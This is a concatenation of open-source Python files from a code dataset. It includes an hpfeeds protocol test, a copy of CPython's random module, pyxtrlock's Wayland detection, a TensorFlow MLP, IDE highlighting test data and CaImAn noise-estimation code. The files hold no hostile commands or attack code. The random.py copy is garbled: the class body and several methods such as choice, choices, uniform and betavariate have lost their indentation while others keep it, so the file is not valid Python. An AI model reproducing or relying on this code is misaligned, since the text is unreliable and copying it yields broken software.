        self.transport.loseConnection.assert_called_with()
    def test_error(self):
        # error() is server-side only; the client implementation must refuse it.
        self.assertRaises(RuntimeError, self.protocol.error, 'error')
    def test_info(self):
        # info() is server-side only; the client implementation must refuse it.
        self.assertRaises(RuntimeError, self.protocol.info, 'name', b'\x00' * 4)
class TestTwistedClientProtocolConnReady(unittest.TestCase):
    """connectionReady() must be safe on a freshly built, unpatched protocol."""
    def test_connectionReady(self):
        self.protocol = ClientProtocol()
        self.protocol.connectionReady()
| rep/hpfeeds | tests/test_twisted_protocol.py | Python | gpl-3.0 | 8,065 |
"""Random variable generators.
integers
--------
uniform within range
sequences
---------
pick random element
pick random sample
pick weighted random sample
generate random permutation
distributions on the real line:
------------------------------
uniform
triangular
normal (Gaussian)
lognormal
negative exponential
gamma
beta
pareto
Weibull
distributions on the circle (angles 0 to 2pi)
---------------------------------------------
circular uniform
von Mises
General notes on the underlying Mersenne Twister core generator:
* The period is 2**19937-1.
* It is one of the most extensively tested generators in existence.
* The random() method is implemented in C, executes in a single Python step,
and is, therefore, threadsafe.
"""
from warnings import warn as _warn
from types import MethodType as _MethodType, BuiltinMethodType as _BuiltinMethodType
from math import log as _log, exp as _exp, pi as _pi, e as _e, ceil as _ceil
from math import sqrt as _sqrt, acos as _acos, cos as _cos, sin as _sin
from os import urandom as _urandom
from _collections_abc import Set as _Set, Sequence as _Sequence
from hashlib import sha512 as _sha512
import itertools as _itertools
import bisect as _bisect
__all__ = ["Random","seed","random","uniform","randint","choice","sample",
"randrange","shuffle","normalvariate","lognormvariate",
"expovariate","vonmisesvariate","gammavariate","triangular",
"gauss","betavariate","paretovariate","weibullvariate",
"getstate","setstate", "getrandbits", "choices",
"SystemRandom"]
# Precomputed constants used by the distribution generators below.
NV_MAGICCONST = 4 * _exp(-0.5)/_sqrt(2.0)  # Kinderman-Monahan constant (normalvariate)
TWOPI = 2.0*_pi
LOG4 = _log(4.0)
SG_MAGICCONST = 1.0 + _log(4.5)  # squeeze-test constant for gammavariate
BPF = 53 # Number of bits in a float
RECIP_BPF = 2**-BPF
# Translated by Guido van Rossum from C source provided by
# Adrian Baddeley. Adapted by Raymond Hettinger for use with
# the Mersenne Twister and os.urandom() core generators.
import _random
class Random(_random.Random):
"""Random number generator base class used by bound module functions.
Used to instantiate instances of Random to get generators that don't
share state.
Class Random can also be subclassed if you want to use a different basic
generator of your own devising: in that case, override the following
methods: random(), seed(), getstate(), and setstate().
Optionally, implement a getrandbits() method so that randrange()
can cover arbitrarily large ranges.
"""
VERSION = 3 # used by getstate/setstate
    def __init__(self, x=None):
        """Initialize an instance.
        Optional argument x controls seeding, as for Random.seed().
        """
        self.seed(x)
        self.gauss_next = None  # cached second deviate produced by gauss()
    def seed(self, a=None, version=2):
        """Initialize internal state from hashable object.
        None or no argument seeds from current time or from an operating
        system specific randomness source if available.
        If *a* is an int, all bits are used.
        For version 2 (the default), all of the bits are used if *a* is a str,
        bytes, or bytearray. For version 1 (provided for reproducing random
        sequences from older versions of Python), the algorithm for str and
        bytes generates a narrower range of seeds.
        """
        if version == 1 and isinstance(a, (str, bytes)):
            # Legacy string hashing, kept so old seed sequences reproduce.
            # NOTE(review): iterating *bytes* yields ints, so ord(c) would
            # raise TypeError for bytes input here -- confirm against upstream.
            x = ord(a[0]) << 7 if a else 0
            for c in a:
                x = ((1000003 * x) ^ ord(c)) & 0xFFFFFFFFFFFFFFFF
            x ^= len(a)
            a = -2 if x == -1 else x
        if version == 2 and isinstance(a, (str, bytes, bytearray)):
            if isinstance(a, str):
                a = a.encode()
            # Append a SHA-512 digest so every input bit influences the seed.
            a += _sha512(a).digest()
            a = int.from_bytes(a, 'big')
        super().seed(a)
        self.gauss_next = None  # discard any cached gauss() deviate
    def getstate(self):
        """Return internal state; can be passed to setstate() later."""
        # (format version, core generator state, pending gauss() deviate)
        return self.VERSION, super().getstate(), self.gauss_next
    def setstate(self, state):
        """Restore internal state from object returned by getstate().
        Accepts state format versions 2 and 3; raises ValueError otherwise.
        """
        version = state[0]
        if version == 3:
            version, internalstate, self.gauss_next = state
            super().setstate(internalstate)
        elif version == 2:
            version, internalstate, self.gauss_next = state
            # In version 2, the state was saved as signed ints, which causes
            # inconsistencies between 32/64-bit systems. The state is
            # really unsigned 32-bit ints, so we convert negative ints from
            # version 2 to positive longs for version 3.
            try:
                internalstate = tuple(x % (2**32) for x in internalstate)
            except ValueError as e:
                # Non-integer entries mean the state object itself is malformed.
                raise TypeError from e
            super().setstate(internalstate)
        else:
            raise ValueError("state with version %s passed to "
                             "Random.setstate() of version %s" %
                             (version, self.VERSION))
## ---- Methods below this point do not need to be overridden when
## ---- subclassing for the purpose of using a different core generator.
## -------------------- pickle support -------------------
# Issue 17489: Since __reduce__ was defined to fix #759889 this is no
# longer called; we leave it here because it has been here since random was
# rewritten back in 2001 and why risk breaking something.
    def __getstate__(self): # for pickle
        """Pickle support: delegate to getstate()."""
        return self.getstate()
    def __setstate__(self, state):  # for pickle
        """Pickle support: delegate to setstate()."""
        self.setstate(state)
    def __reduce__(self):
        # Reconstruct via the class with no args, then restore the full state.
        return self.__class__, (), self.getstate()
## -------------------- integer methods -------------------
    def randrange(self, start, stop=None, step=1, _int=int):
        """Choose a random item from range(start, stop[, step]).
        This fixes the problem with randint() which includes the
        endpoint; in Python this is usually not what you want.
        """
        # This code is a bit messy to make it fast for the
        # common case while still doing adequate error checking.
        istart = _int(start)
        if istart != start:
            raise ValueError("non-integer arg 1 for randrange()")
        if stop is None:
            # One-argument form: randrange(stop) -> value in [0, stop).
            if istart > 0:
                return self._randbelow(istart)
            raise ValueError("empty range for randrange()")
        # stop argument supplied.
        istop = _int(stop)
        if istop != stop:
            raise ValueError("non-integer stop for randrange()")
        width = istop - istart
        if step == 1 and width > 0:
            return istart + self._randbelow(width)
        if step == 1:
            raise ValueError("empty range for randrange() (%d,%d, %d)" % (istart, istop, width))
        # Non-unit step argument supplied.
        istep = _int(step)
        if istep != step:
            raise ValueError("non-integer step for randrange()")
        # n = number of elements in range(istart, istop, istep)
        if istep > 0:
            n = (width + istep - 1) // istep
        elif istep < 0:
            n = (width + istep + 1) // istep
        else:
            raise ValueError("zero step for randrange()")
        if n <= 0:
            raise ValueError("empty range for randrange()")
        return istart + istep*self._randbelow(n)
    def randint(self, a, b):
        """Return random integer in range [a, b], including both end points.
        """
        # randrange() excludes its stop value, so widen by one.
        return self.randrange(a, b+1)
    def _randbelow(self, n, int=int, maxsize=1<<BPF, type=type,
                   Method=_MethodType, BuiltinMethod=_BuiltinMethodType):
        "Return a random int in the range [0,n).  Raises ValueError if n==0."
        random = self.random
        getrandbits = self.getrandbits
        # Only call self.getrandbits if the original random() builtin method
        # has not been overridden or if a new getrandbits() was supplied.
        if type(random) is BuiltinMethod or type(getrandbits) is Method:
            k = n.bit_length()  # don't use (n-1) here because n can be 1
            r = getrandbits(k)  # 0 <= r < 2**k
            # Rejection sampling keeps the result exactly uniform over [0, n).
            while r >= n:
                r = getrandbits(k)
            return r
        # There's an overridden random() method but no new getrandbits() method,
        # so we can only use random() from here.
        if n >= maxsize:
            _warn("Underlying random() generator does not supply \n"
                "enough bits to choose from a population range this large.\n"
                "To remove the range limitation, add a getrandbits() method.")
            return int(random() * n)
        rem = maxsize % n
        limit = (maxsize - rem) / maxsize   # int(limit * maxsize) % n == 0
        r = random()
        # Reject the tail of the float range that would bias the modulus.
        while r >= limit:
            r = random()
        return int(r*maxsize) % n
## -------------------- sequence methods -------------------
def choice(self, seq):
"""Choose a random element from a non-empty sequence."""
try:
i = self._randbelow(len(seq))
except ValueError:
raise IndexError('Cannot choose from an empty sequence')
return seq[i]
    def shuffle(self, x, random=None):
        """Shuffle list x in place, and return None.
        Optional argument random is a 0-argument function returning a
        random float in [0.0, 1.0); if it is the default None, the
        standard random.random will be used.
        """
        # Fisher-Yates shuffle, walking from the tail toward the head.
        if random is None:
            randbelow = self._randbelow
            for i in reversed(range(1, len(x))):
                # pick an element in x[:i+1] with which to exchange x[i]
                j = randbelow(i+1)
                x[i], x[j] = x[j], x[i]
        else:
            # Caller-supplied generator: derive the index from a float draw.
            _int = int
            for i in reversed(range(1, len(x))):
                # pick an element in x[:i+1] with which to exchange x[i]
                j = _int(random() * (i+1))
                x[i], x[j] = x[j], x[i]
    def sample(self, population, k):
        """Chooses k unique random elements from a population sequence or set.
        Returns a new list containing elements from the population while
        leaving the original population unchanged. The resulting list is
        in selection order so that all sub-slices will also be valid random
        samples. This allows raffle winners (the sample) to be partitioned
        into grand prize and second place winners (the subslices).
        Members of the population need not be hashable or unique. If the
        population contains repeats, then each occurrence is a possible
        selection in the sample.
        To choose a sample in a range of integers, use range as an argument.
        This is especially fast and space efficient for sampling from a
        large population: sample(range(10000000), 60)
        """
        # Sampling without replacement entails tracking either potential
        # selections (the pool) in a list or previous selections in a set.
        # When the number of selections is small compared to the
        # population, then tracking selections is efficient, requiring
        # only a small set and an occasional reselection. For
        # a larger number of selections, the pool tracking method is
        # preferred since the list takes less space than the
        # set and it doesn't suffer from frequent reselections.
        if isinstance(population, _Set):
            population = tuple(population)
        if not isinstance(population, _Sequence):
            raise TypeError("Population must be a sequence or set. For dicts, use list(d).")
        randbelow = self._randbelow
        n = len(population)
        if not 0 <= k <= n:
            raise ValueError("Sample larger than population or is negative")
        result = [None] * k
        setsize = 21        # size of a small set minus size of an empty list
        if k > 5:
            setsize += 4 ** _ceil(_log(k * 3, 4)) # table size for big sets
        if n <= setsize:
            # An n-length list is smaller than a k-length set
            pool = list(population)
            for i in range(k): # invariant: non-selected at [0,n-i)
                j = randbelow(n-i)
                result[i] = pool[j]
                pool[j] = pool[n-i-1] # move non-selected item into vacancy
        else:
            # Selection-tracking path: re-draw until an unused index appears.
            selected = set()
            selected_add = selected.add
            for i in range(k):
                j = randbelow(n)
                while j in selected:
                    j = randbelow(n)
                selected_add(j)
                result[i] = population[j]
        return result
def choices(self, population, weights=None, *, cum_weights=None, k=1):
"""Return a k sized list of population elements chosen with replacement.
If the relative weights or cumulative weights are not specified,
the selections are made with equal probability.
"""
random = self.random
if cum_weights is None:
if weights is None:
_int = int
total = len(population)
return [population[_int(random() * total)] for i in range(k)]
cum_weights = list(_itertools.accumulate(weights))
elif weights is not None:
raise TypeError('Cannot specify both weights and cumulative weights')
if len(cum_weights) != len(population):
raise ValueError('The number of weights does not match the population')
bisect = _bisect.bisect
total = cum_weights[-1]
return [population[bisect(cum_weights, random() * total)] for i in range(k)]
## -------------------- real-valued distributions -------------------
## -------------------- uniform distribution -------------------
def uniform(self, a, b):
"Get a random number in the range [a, b) or [a, b] depending on rounding."
return a + (b-a) * self.random()
## -------------------- triangular --------------------
    def triangular(self, low=0.0, high=1.0, mode=None):
        """Triangular distribution.
        Continuous distribution bounded by given lower and upper limits,
        and having a given mode value in-between.
        http://en.wikipedia.org/wiki/Triangular_distribution
        """
        u = self.random()
        try:
            c = 0.5 if mode is None else (mode - low) / (high - low)
        except ZeroDivisionError:
            # Degenerate case low == high: the distribution is a single point.
            return low
        if u > c:
            # Reflect to sample the descending side of the triangle.
            u = 1.0 - u
            c = 1.0 - c
            low, high = high, low
        return low + (high - low) * (u * c) ** 0.5
## -------------------- normal distribution --------------------
    def normalvariate(self, mu, sigma):
        """Normal distribution.
        mu is the mean, and sigma is the standard deviation.
        """
        # mu = mean, sigma = standard deviation
        # Uses Kinderman and Monahan method. Reference: Kinderman,
        # A.J. and Monahan, J.F., "Computer generation of random
        # variables using the ratio of uniform deviates", ACM Trans
        # Math Software, 3, (1977), pp257-260.
        random = self.random
        while 1:
            u1 = random()
            u2 = 1.0 - random()
            z = NV_MAGICCONST*(u1-0.5)/u2
            zz = z*z/4.0
            # Accept when the candidate falls under the target density.
            if zz <= -_log(u2):
                break
        return mu + z*sigma
## -------------------- lognormal distribution --------------------
def lognormvariate(self, mu, sigma):
"""Log normal distribution.
If you take the natural logarithm of this distribution, you'll get a
normal distribution with mean mu and standard deviation sigma.
mu can have any value, and sigma must be greater than zero.
"""
return _exp(self.normalvariate(mu, sigma))
## -------------------- exponential distribution --------------------
def expovariate(self, lambd):
"""Exponential distribution.
lambd is 1.0 divided by the desired mean. It should be
nonzero. (The parameter would be called "lambda", but that is
a reserved word in Python.) Returned values range from 0 to
positive infinity if lambd is positive, and from negative
infinity to 0 if lambd is negative.
"""
# lambd: rate lambd = 1/mean
# ('lambda' is a Python reserved word)
# we use 1-random() instead of random() to preclude the
# possibility of taking the log of zero.
return -_log(1.0 - self.random())/lambd
## -------------------- von Mises distribution --------------------
    def vonmisesvariate(self, mu, kappa):
        """Circular data distribution.
        mu is the mean angle, expressed in radians between 0 and 2*pi, and
        kappa is the concentration parameter, which must be greater than or
        equal to zero.  If kappa is equal to zero, this distribution reduces
        to a uniform random angle over the range 0 to 2*pi.
        """
        # mu:    mean angle (in radians between 0 and 2*pi)
        # kappa: concentration parameter kappa (>= 0)
        # if kappa = 0 generate uniform random angle
        # Based upon an algorithm published in: Fisher, N.I.,
        # "Statistical Analysis of Circular Data", Cambridge
        # University Press, 1993.
        # Thanks to Magnus Kessler for a correction to the
        # implementation of step 4.
        random = self.random
        if kappa <= 1e-6:
            return TWOPI * random()
        s = 0.5 / kappa
        r = s + _sqrt(1.0 + s * s)
        while 1:
            u1 = random()
            z = _cos(_pi * u1)
            d = z / (r + z)
            u2 = random()
            # Acceptance/rejection test (Fisher, step 4).
            if u2 < 1.0 - d * d or u2 <= (1.0 - d) * _exp(d):
                break
        q = 1.0 / r
        f = (q + z) / (1.0 + q * z)
        u3 = random()
        # Pick the side of the mean angle at random.
        if u3 > 0.5:
            theta = (mu + _acos(f)) % TWOPI
        else:
            theta = (mu - _acos(f)) % TWOPI
        return theta
## -------------------- gamma distribution --------------------
    def gammavariate(self, alpha, beta):
        """Gamma distribution.  Not the gamma function!
        Conditions on the parameters are alpha > 0 and beta > 0.
        The probability distribution function is:
                    x ** (alpha - 1) * math.exp(-x / beta)
          pdf(x) =  --------------------------------------
                      math.gamma(alpha) * beta ** alpha
        """
        # alpha > 0, beta > 0, mean is alpha*beta, variance is alpha*beta**2
        # Warning: a few older sources define the gamma distribution in terms
        # of alpha > -1.0
        if alpha <= 0.0 or beta <= 0.0:
            raise ValueError('gammavariate: alpha and beta must be > 0.0')
        random = self.random
        if alpha > 1.0:
            # Uses R.C.H. Cheng, "The generation of Gamma
            # variables with non-integral shape parameters",
            # Applied Statistics, (1977), 26, No. 1, p71-74
            ainv = _sqrt(2.0 * alpha - 1.0)
            bbb = alpha - LOG4
            ccc = alpha + ainv
            while 1:
                u1 = random()
                # Guard against u1 values that would overflow the logit below.
                if not 1e-7 < u1 < .9999999:
                    continue
                u2 = 1.0 - random()
                v = _log(u1/(1.0-u1))/ainv
                x = alpha*_exp(v)
                z = u1*u1*u2
                r = bbb+ccc*v-x
                # Cheap squeeze test first, exact acceptance test second.
                if r + SG_MAGICCONST - 4.5*z >= 0.0 or r >= _log(z):
                    return x * beta
        elif alpha == 1.0:
            # expovariate(1): draw u away from zero so _log(u) is finite.
            u = random()
            while u <= 1e-7:
                u = random()
            return -_log(u) * beta
        else:   # alpha is between 0 and 1 (exclusive)
            # Uses ALGORITHM GS of Statistical Computing - Kennedy & Gentle
            while 1:
                u = random()
                b = (_e + alpha)/_e
                p = b*u
                if p <= 1.0:
                    x = p ** (1.0/alpha)
                else:
                    x = -_log((b-p)/alpha)
                u1 = random()
                if p > 1.0:
                    if u1 <= x ** (alpha - 1.0):
                        break
                elif u1 <= _exp(-x):
                    break
            return x * beta
## -------------------- Gauss (faster alternative) --------------------
    def gauss(self, mu, sigma):
        """Gaussian distribution.
        mu is the mean, and sigma is the standard deviation.  This is
        slightly faster than the normalvariate() function.
        Not thread-safe without a lock around calls.
        """
        # When x and y are two variables from [0, 1), uniformly
        # distributed, then
        #
        #    cos(2*pi*x)*sqrt(-2*log(1-y))
        #    sin(2*pi*x)*sqrt(-2*log(1-y))
        #
        # are two *independent* variables with normal distribution
        # (mu = 0, sigma = 1).
        # (Lambert Meertens)
        # (corrected version; bug discovered by Mike Miller, fixed by LM)
        # Multithreading note: When two threads call this function
        # simultaneously, it is possible that they will receive the
        # same return value.  The window is very small though.  To
        # avoid this, you have to use a lock around all calls.  (I
        # didn't want to slow this down in the serial case by using a
        # lock here.)
        random = self.random
        z = self.gauss_next
        self.gauss_next = None
        if z is None:
            # Box-Muller produces deviates in pairs; cache the second one.
            x2pi = random() * TWOPI
            g2rad = _sqrt(-2.0 * _log(1.0 - random()))
            z = _cos(x2pi) * g2rad
            self.gauss_next = _sin(x2pi) * g2rad
        return mu + z*sigma
## -------------------- beta --------------------
## See
## http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.html
## for Ivan Frohne's insightful analysis of why the original implementation:
##
## def betavariate(self, alpha, beta):
## # Discrete Event Simulation in C, pp 87-88.
##
## y = self.expovariate(alpha)
## z = self.expovariate(1.0/beta)
## return z/(y+z)
##
## was dead wrong, and how it probably got that way.
def betavariate(self, alpha, beta):
"""Beta distribution.
Conditions on the parameters are alpha > 0 and beta > 0.
Returned values range between 0 and 1.
"""
# This version due to Janne Sinkkonen, and matches all the std
# texts (e.g., Knuth Vol 2 Ed 3 pg 134 "the beta distribution").
y = self.gammavariate(alpha, 1.0)
if y == 0:
return 0.0
else:
return y / (y + self.gammavariate(beta, 1.0))
## -------------------- Pareto --------------------
def paretovariate(self, alpha):
"""Pareto distribution. alpha is the shape parameter."""
# Jain, pg. 495
u = 1.0 - self.random()
return 1.0 / u ** (1.0/alpha)
## -------------------- Weibull --------------------
def weibullvariate(self, alpha, beta):
"""Weibull distribution.
alpha is the scale parameter and beta is the shape parameter.
"""
# Jain, pg. 499; bug fix courtesy Bill Arms
u = 1.0 - self.random()
return alpha * (-_log(u)) ** (1.0/beta)
## --------------- Operating System Random Source ------------------
class SystemRandom(Random):
    """Alternate random number generator using sources provided
    by the operating system (such as /dev/urandom on Unix or
    CryptGenRandom on Windows).
     Not available on all systems (see os.urandom() for details).
    """
    def random(self):
        """Get the next random number in the range [0.0, 1.0)."""
        # 7 urandom bytes give 56 bits; shift out 3 so exactly 53 (BPF) remain.
        return (int.from_bytes(_urandom(7), 'big') >> 3) * RECIP_BPF
    def getrandbits(self, k):
        """getrandbits(k) -> x.  Generates an int with k random bits."""
        if k <= 0:
            raise ValueError('number of bits must be greater than zero')
        if k != int(k):
            raise TypeError('number of bits should be an integer')
        numbytes = (k + 7) // 8 # bits / 8 and rounded up
        x = int.from_bytes(_urandom(numbytes), 'big')
        return x >> (numbytes * 8 - k) # trim excess bits
    def seed(self, *args, **kwds):
        "Stub method.  Not used for a system random number generator."
        return None
    def _notimplemented(self, *args, **kwds):
        "Method should not be called for a system random number generator."
        raise NotImplementedError('System entropy source does not have state.')
    # OS entropy has no observable state, so both accessors are disabled.
    getstate = setstate = _notimplemented
## -------------------- test program --------------------
def _test_generator(n, func, args):
import time
print(n, 'times', func.__name__)
total = 0.0
sqsum = 0.0
smallest = 1e10
largest = -1e10
t0 = time.time()
for i in range(n):
x = func(*args)
total += x
sqsum = sqsum + x*x
smallest = min(x, smallest)
largest = max(x, largest)
t1 = time.time()
print(round(t1-t0, 3), 'sec,', end=' ')
avg = total/n
stddev = _sqrt(sqsum/n - avg*avg)
print('avg %g, stddev %g, min %g, max %g\n' % \
(avg, stddev, smallest, largest))
def _test(N=2000):
    """Exercise each module-level distribution N times and print statistics."""
    _test_generator(N, random, ())
    _test_generator(N, normalvariate, (0.0, 1.0))
    _test_generator(N, lognormvariate, (0.0, 1.0))
    _test_generator(N, vonmisesvariate, (0.0, 1.0))
    # gammavariate is sampled across all three algorithm branches
    # (alpha < 1, alpha == 1, alpha > 1).
    _test_generator(N, gammavariate, (0.01, 1.0))
    _test_generator(N, gammavariate, (0.1, 1.0))
    _test_generator(N, gammavariate, (0.1, 2.0))
    _test_generator(N, gammavariate, (0.5, 1.0))
    _test_generator(N, gammavariate, (0.9, 1.0))
    _test_generator(N, gammavariate, (1.0, 1.0))
    _test_generator(N, gammavariate, (2.0, 1.0))
    _test_generator(N, gammavariate, (20.0, 1.0))
    _test_generator(N, gammavariate, (200.0, 1.0))
    _test_generator(N, gauss, (0.0, 1.0))
    _test_generator(N, betavariate, (3.0, 3.0))
    _test_generator(N, triangular, (0.0, 1.0, 1.0/3.0))
# Create one instance, seeded from current time, and export its methods
# as module-level functions. The functions share state across all uses
#(both in the user's code and in the Python libraries), but that's fine
# for most programs and is easier for the casual user than making them
# instantiate their own Random() instance.
# Shared hidden instance; its bound methods form the module-level API
# (see the comment block above).
_inst = Random()
seed = _inst.seed
random = _inst.random
uniform = _inst.uniform
triangular = _inst.triangular
randint = _inst.randint
choice = _inst.choice
randrange = _inst.randrange
sample = _inst.sample
shuffle = _inst.shuffle
choices = _inst.choices
normalvariate = _inst.normalvariate
lognormvariate = _inst.lognormvariate
expovariate = _inst.expovariate
vonmisesvariate = _inst.vonmisesvariate
gammavariate = _inst.gammavariate
gauss = _inst.gauss
betavariate = _inst.betavariate
paretovariate = _inst.paretovariate
weibullvariate = _inst.weibullvariate
getstate = _inst.getstate
setstate = _inst.setstate
getrandbits = _inst.getrandbits
if __name__ == '__main__':
    _test()
| thecodinghub/news-for-good | news/Lib/random.py | Python | bsd-3-clause | 27,228 |
import os
import socket
import sys
from xdg.BaseDirectory import get_runtime_dir
def panic(*message_parts, exit_code=1):
    """Write an error message (prefixed "pyxtrlock:") to stderr and abort
    the process with *exit_code*."""
    print("pyxtrlock:", *message_parts, file=sys.stderr)
    raise SystemExit(exit_code)
def require_x11_session():
    """
    Detect whether we're running in a Wayland session and abort if so.
    Screen locking from an X11 client is ineffective under Wayland, so
    a suspected Wayland session is treated as fatal.
    """
    # An explicitly declared X11 session is trusted as-is.
    if os.environ.get("XDG_SESSION_TYPE") == "x11":
        return
    if os.environ.get("WAYLAND_DISPLAY"):
        panic(
            "WAYLAND_DISPLAY is set, suspecting Wayland session. "
            "Using pyxtrlock in a Wayland session is insecure. Aborting."
        )
    if os.environ.get("WAYLAND_SOCKET"):
        panic(
            "WAYLAND_SOCKET is set, suspecting Wayland session. "
            "Using pyxtrlock in a Wayland session is insecure. Aborting."
        )
    # Last resort: probe for a live compositor socket in the XDG runtime dir.
    # NOTE(review): only "wayland-0" is probed; a compositor bound to
    # wayland-1 or higher would go undetected -- confirm this is intended.
    xdg_runtime_dir = get_runtime_dir(strict=True)
    wayland_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM, 0)
    try:
        wayland_socket.connect(os.path.join(xdg_runtime_dir, "wayland-0"))
    except OSError:
        # No compositor answered; assume we are safe on X11.
        return
    else:
        panic(
            "Successfully connected to Wayland socket, suspecting Wayland session. "
            "Using pyxtrlock in a Wayland session is insecure. Aborting."
        )
    finally:
        wayland_socket.close()
| leonnnn/pyxtrlock | pyxtrlock/__init__.py | Python | gpl-3.0 | 1,342 |
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 20 10:07:47 2018
@author: fschneider
"""
import tensorflow as tf
def _mlp(x, num_outputs):
    """Build a three-hidden-layer MLP (1000-500-100 ReLU units) on *x*.
    The input is flattened to 784 features (28x28 MNIST-style images --
    TODO confirm input shape) and the returned tensor is the final linear
    layer with *num_outputs* units (logits; no activation applied).
    """
    def dense(inputs, units, activation=tf.nn.relu):
        """Convenience wrapper for fully-connected (dense) layers."""
        # Zero-initialized biases; small truncated-normal weight init.
        return tf.layers.dense(
            inputs,
            units,
            activation,
            bias_initializer=tf.initializers.constant(0.0),
            kernel_initializer=tf.truncated_normal_initializer(stddev=3e-2))
    x = tf.reshape(x, [-1, 784])
    x = dense(x, 1000)
    x = dense(x, 500)
    x = dense(x, 100)
    linear_outputs = dense(x, num_outputs, None)
    return linear_outputs
| fsschneider/DeepOBS | deepobs/tensorflow/testproblems/_mlp.py | Python | mit | 660 |
def handle(foo, *args, <error descr="multiple * parameters are not allowed">*moreargs</error>):
print(foo, args, moreargs)
def handle(foo, *args: int, <error descr="multiple * parameters are not allowed">*moreargs: int</error>):
print(foo, args, moreargs) | dahlstrom-g/intellij-community | python/testData/highlighting/multiplePositionalContainers.py | Python | apache-2.0 | 264 |
from collections import namedtuple
import sklearn.linear_model as lm
import numpy as np
from . import gat, regions
def compute_score(sigmas, tol):
    """Score how tightly *sigmas* cluster around 1 with a Gaussian kernel.

    Returns (sigma_est, score): score is the sum of the kernel weights and
    sigma_est the weighted mean of sigmas (NaN when the score is zero).
    """
    normalized = (sigmas - 1) / tol
    weights = np.exp(-normalized ** 2)
    score = np.sum(weights)
    if score <= 0:
        return np.nan, score
    return np.sum(sigmas * weights) / score, score
# Result of a Hough grid search: the full score surface, the parameter ranges
# that were scanned, and the (sigma_sq, alpha) pair at the maximum.
AccumulatorSpace = namedtuple('AccumulatorSpace', ['score', 'sigma_sq_range', 'alpha_range', 'sigma_sq', 'alpha'])
def hough_estimation(blocks, sigma_sq_range, alpha_range, tol=1e-2):
    """Grid-search (sigma_sq, alpha) maximizing the GAT stabilization score.
    For each candidate pair the blocks are variance-stabilized via the GAT
    and scored on how close the per-block standard deviations are to 1.
    Returns (sigma_sq_est, alpha_est, AccumulatorSpace).
    """
    score = np.zeros((len(sigma_sq_range), len(alpha_range)))
    for i_a, alpha in enumerate(alpha_range):
        for i_s, sigma_sq in enumerate(sigma_sq_range):
            # print('{} / {}'.format(i_a, len(alpha_range)), '--',
            #       '{} / {}'.format(i_s, len(sigma_range)))
            blocks_gat = gat.compute_gat(blocks, sigma_sq, alpha=alpha)
            sigmas = np.std(blocks_gat, axis=(1, 2), ddof=1)
            score[i_s, i_a] = compute_score(sigmas, tol)[1]
    # Locate the maximum of the 2-D score surface.
    max_score_idx = np.argmax(score)
    best_params = np.unravel_index(max_score_idx, score.shape)
    sigma_sq_est = sigma_sq_range[best_params[0]]
    alpha_est = alpha_range[best_params[1]]
    print('\tHighest score=', score[best_params[0], best_params[1]])
    acc = AccumulatorSpace(score, sigma_sq_range, alpha_range, sigma_sq_est, alpha_est)
    return sigma_sq_est, alpha_est, acc
def hough_estimation_point(img, sigma, alpha, tol=2e-3):
    """Evaluate the Hough estimation at a single (sigma, alpha) point."""
    sigma_range = [sigma]
    alpha_range = [alpha]
    return hough_estimation(img, sigma_range, alpha_range, tol=tol)
def compute_mean_var(blocks):
    """Per-block mean and unbiased (ddof=1) variance over each block's pixels.

    *blocks* is a stack shaped (n_blocks, h, w); returns two length-n arrays.
    """
    pixel_axes = (1, 2)
    means = np.mean(blocks, axis=pixel_axes)
    variances = np.var(blocks, axis=pixel_axes, ddof=1)
    return means, variances
def regress_sigma_alpha(means, variances, verbose=True):
    """Robustly fit the affine noise model ``variance = alpha * mean + sigma_sq``.

    Uses a Huber regressor (outlier-resistant) with an intercept and no
    regularization.  Returns (sigma_sq, alpha).

    Note: *verbose* is accepted for backward compatibility but is unused.
    """
    reg = lm.HuberRegressor(alpha=0, fit_intercept=True)
    reg.fit(means[:, np.newaxis], variances)
    alpha = reg.coef_[0]
    sigma_sq = reg.intercept_
    return sigma_sq, alpha
def initial_estimate_sigma_alpha(blocks):
    """Seed (sigma_sq, alpha) estimate via the mean/variance regression."""
    means, variances = compute_mean_var(blocks)
    return regress_sigma_alpha(means, variances, verbose=False)
# Initial and refined parameter estimates, with both accumulator spaces
# from the coarse and fine Hough searches.
EstimationResult = namedtuple('EstimationResult',
                              ['alpha_init', 'sigma_sq_init', 'alpha', 'sigma_sq', 'acc_space_init', 'acc_space'])
def estimate_vst_movie(movie, block_size=8, stride=8):
    """Estimate VST parameters from the blocks of every frame in *movie*."""
    per_frame = [regions.im2col(frame, block_size, stride) for frame in movie]
    return estimate_vst_blocks(np.vstack(per_frame))
def estimate_vst_image(img, block_size=8, stride=8):
    """Estimate VST parameters from the blocks of a single image."""
    return estimate_vst_blocks(regions.im2col(img, block_size, stride))
def estimate_vst_blocks(blocks):
    """Coarse-to-fine estimation of the GAT parameters (alpha, sigma_sq).
    Starts from a robust regression estimate, then refines it with two
    progressively narrower Hough grid searches.  Returns EstimationResult.
    """
    sigma_sq_init, alpha_init = initial_estimate_sigma_alpha(blocks)
    print('\tinitial alpha = {}; sigma^2 = {}'.format(alpha_init, sigma_sq_init))
    # First (coarse) search window around the regression estimate.
    diff_s = np.maximum(2e3, np.abs(sigma_sq_init))
    diff_a = alpha_init * 0.9
    sigma_sq_range = np.linspace(sigma_sq_init - diff_s, sigma_sq_init + diff_s, num=100)
    alpha_range = np.linspace(alpha_init - diff_a, alpha_init + diff_a, num=100)
    sigma_sq_mid, alpha_mid, acc_init = hough_estimation(blocks, sigma_sq_range, alpha_range)
    print('\tmid alpha = {}; sigma^2 = {}'.format(alpha_mid, sigma_sq_mid))
    # Second (fine) search window centered on the coarse optimum.
    diff_s /= 10
    diff_a /= 4
    sigma_sq_range = np.linspace(sigma_sq_mid - diff_s, sigma_sq_mid + diff_s, num=100)
    alpha_range = np.linspace(alpha_mid - diff_a, alpha_mid + diff_a, num=100)
    sigma_sq_final, alpha_final, acc = hough_estimation(blocks, sigma_sq_range, alpha_range)
    print('\talpha = {}; sigma^2 = {}'.format(alpha_final, sigma_sq_final))
    return EstimationResult(alpha_init, sigma_sq_init, alpha_final, sigma_sq_final, acc_init, acc)
| simonsfoundation/CaImAn | caiman/external/houghvst/estimation.py | Python | gpl-2.0 | 3,834 |
#Copyright (C) 2013 Miheer Dewaskar <miheerdew@gmail.com>
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
